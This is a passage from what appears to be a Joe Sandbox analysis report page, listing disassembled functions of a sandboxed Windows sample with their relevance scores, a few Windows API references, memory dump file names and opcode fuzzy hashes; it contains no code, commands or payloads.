
Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 34527147-0
Opcode ID: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
Instruction ID: fe922f0d0e82439ddfc87cde08ee7d86f4d598a0ef484a25f6fd7b97544519f0
Opcode Fuzzy Hash: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
Instruction Fuzzy Hash: 8191D322B2865282EB10EB62D4467ADE361FB94BC8F844433EE0D47B95DEBCD545C391

Function 00007FF7E1DC51A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF7E1DC51D5

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction ID: a990a628fd2b3b237ef2b5a044ce211c5fcc4977510e792b9490283402874f0c
Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction Fuzzy Hash: AE011BB5A0854286E724EB00E85277AB7A2BBD8315FD00236F59D42794DFBCE5018E11

Function 00007FF7E1DE8C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF7E1DE8DD3

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction ID: 9d0fef2836c4b9a7505e035c883e13016a078e058e807aee5f3283ae77facbc6
Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction Fuzzy Hash: E6813A21E185424AFBACEA19804277DA390EF51745FD49433DD09C7695CFBEE8A1C363

Function 00007FF7E1DE89A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF7E1DE8B3A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: 2ff77a8c2a2b3f485ca613653eaaa1c99f2af5c1b1e3ee639dacc37869ec5dfc
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: 0F711821E0C68246EB6CEA18904237EE3909F41746F94D537CD09C76D6CEBDE8E68763

Function 00007FF7E1DCC96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

gj, xrefs: 00007FF7E1DCC97B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction ID: 54767055b0ae5f47a8ddc3db22b5055622c125dc8776da6748066c2944480679
Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction Fuzzy Hash: 1B519237B286908BD724CF25E405A9EB3A5F388758F445126EF4A93B09CB3DE945CF40

Function 00007FF7E1DEC838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF7E1DEC874

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction ID: 9111010dee5175b12842b88bd858c5a5a3ced36bfdb66f5dbd6ffc35d8f02f12
Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction Fuzzy Hash: AA41B032B14A4886EB08DF2AE9652A9B3A1B758FD4B899037EE4D87754DE7CD442C300

Function 00007FF7E1DF0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7E1DF0D24

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction ID: 3eb1d43793dab161c1354f6e4da5becc98958ca56b2a06097d6c38dd430164d9
Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction Fuzzy Hash: D0B09220F17A02C2EB087B116C8335862E4BF48701FD9807AD14D81330DE7C21F54723

Function 00007FF7E1DD3964 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction ID: 9a7d2222004603a1767021f0538e1fc8995b61fe3b1edb5e6a5a0083cc85d305
Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction Fuzzy Hash: 7B8223A3A096C186DB05DF28D4453FCBBA1E751B88F99833BCA4E07785DA7CD445C322

Function 00007FF7E1DB76C0 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction ID: 7f40b35986d10943d8751bdbb713c377f33ca64471453d96d3bc7df267ebfb5f
Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction Fuzzy Hash: 69627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF7E1DD53F0 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction ID: 46e05863926a176fd6c90aead96d1aea731fd3e2deebeba1e998f4031bc4702a
Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction Fuzzy Hash: AA820FB3A096C18ADB24DF28D4057FCBBB1E755B48F498236CA4D47789CA7CD885C722

Function 00007FF7E1DCBB90 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction ID: 3b4ee6d9a5e77cf23164917e5af28c706b5bfd33ee782436580e53866e7050f4
Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction Fuzzy Hash: B922F5B3B246508BD728CF25C89AE5E3766F798744B4B8229DF0ACB785DB38D505CB40

Function 00007FF7E1DD4B98 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction ID: f2d48690052f61d4245e9c2b0b8e23078cb7b24fc7f7d523381c5c170647d5e7
Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction Fuzzy Hash: 483222B3A081918BE71DDF28D451BBC77A1F754B48F41823ADA4A87B88DB7CE850CB51

Function 00007FF7E1DB7288 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction ID: c8fa702fdca6007611340aaed07606a756b9b41cb8d732d2190e397efb932053
Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction Fuzzy Hash: 4BC19DB7B281908FE350CF7AE400A9D7BB1F39878CB519125EF59A3B09D639E645CB40

Function 00007FF7E1DD2D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction ID: 0914e69bd3620fe6e3305db1997410ba576ba2b0832838d4fd14d6317fa5d5b2
Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction Fuzzy Hash: FCA16973E0818286EB25FA24D4467FDA791EB90744F964737DA4E07786CEBCE841C362

Function 00007FF7E1DCAF18 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction ID: 69428669ac4c0c88c107d31c58656b1baa7211f097f9d8a3bccfe6773561bf98
Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction Fuzzy Hash: 0EC1E477A291E04DE302CBB5A4248FD3FB1F71E34DB4A4152EF9666B4AD6389201DF60

Function 00007FF7E1DBA310 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction ID: dae93334c975e00fbdb9265867678e08cd26bdb86136b0e813a1091beb67aee0
Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction Fuzzy Hash: B2913062B18581A6EB11EF29D4467FDA721FF95788F840032EF4E47749EE78EA06C710

Function 00007FF7E1DCB534 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction ID: b9ed08bd83f2ef9f61ebaeade8d1e44404dd0abee10e930ba0bb66bb40ab68fc
Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction Fuzzy Hash: A6614222B182D049EB01DF70C5016FDBFA1B7197C4B9A8433DE9A57686CA7CE106CBA1

Function 00007FF7E1DD21D0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction ID: 7522dd5e8ffea35a9ca7df53aa8dacf3c448550dcc0f201a6e788a6df14d4b50
Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction Fuzzy Hash: 07515773B181514BE728DF28D0067BDB761FB80B48F868236EB4947A88CE7DE941CB11

Function 00007FF7E1DD2AB0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction ID: 81a873428a3e2f7fa1850eb1f143249602f471f48c3dbe6910bdc2b25fce857c
Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction Fuzzy Hash: 8A312AB2A086814BD719EE56D69237EBBD0F784740F45863ADF4A83B41DBBCE045C711

Function 00007FF7E1DF58E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
